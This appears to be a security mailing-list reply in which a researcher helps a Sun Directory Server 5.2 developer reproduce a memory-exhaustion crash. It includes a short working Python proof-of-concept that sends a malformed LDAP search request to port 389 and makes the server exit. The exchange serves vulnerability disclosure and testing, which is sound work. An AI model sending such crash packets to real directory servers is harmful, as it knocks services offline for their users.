Re: ??? Sun Directory Server 5.2 fun ???

["Evgeny Legerov" <admin () gleg net>]

Hi,

> payothl () free fr wrote:
> Hi Evgeny,
>
> I tried your "ProtoVer LDAP" on the last DS5.2Patch4 but 
> without success.
>
> It appears from the error message that the
> Directory Server shut itself down after trying to 
> allocate 1.6GB of
> memory after receiving a 40K request from a client. 
> From the sample
> packet provided, it was a subtree search request with a 
> base DN of
> "dc={40,000 plus signs},dc=example,dc=com" with a filter 
> of "(foo=*)". The
> search base DN is technically malformed, but even if 
> that's the
> case, then it is no excuse for causing the Directory 
> Server to allocate
> an excessive amount of memory and shut itself down.
>
> However, I have tested this issue on both Solaris and 
> Linux and have
> been unable to reproduce it.  I am sending exactly the 
> same request as
> contained in the e-mail message describing the problem, 
> but I can't seem
> to make the server try to allocate a significant amount 
> of memory, shut
> down, or become unresponsive in any way.  I will say 
> that behavior of
> the Directory Server is not entirely correct in that it 
> never sends a
> response to the client, but it will eventually terminate 
> the client
> connection.  It appears that the length of time before 
> the server closes
> the connection to the client is equal to two times the 
> configured value
> of the  nsslapd-ioblocktimeout attribute.
>
> There is a legitimate way to exploit this problem that I 
> haven't
> discovered yet.
> I think that there is a little bit more configuration 
> required before this can
> be exercised
>
> If you can reproduce this problem for yourself and 
> provide me
> with the details regarding how you were able to do, I 
> will appreciate.
>
> Guillaume

Try the following simple code:
"""
from socket import *

s="\x30\x82\xea\x8b\x02\x01\x01\x63\x82\xea\x84\x04\x82\xea\x60"
s+="\x2b"*60000
s+="\x41\x01\x02\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0b"
s+="\x6f\x62\x6a\x65\x63\x74\x43\x6c\x61\x73\x73\x30\x02\x04\x00"
sock=socket(AF_INET, SOCK_STREAM)
sock.connect(("localhost",389))
sock.sendall(s)
"""

In my testing (default install of SD 5.2), the server 
prints the following message and exits:
...
 Memory allocation error  calloc of 3600420010 bytes 
failed; errno 12
...

Also you could try ProtoVer Sample LDAP testsuite 
(http://www.gleg.net/protover_ldap_sample.shtml) which is 
known to reproduce this particular problem.

Best regards,
Evgeny Legerov
CEO, GLEG Ltd.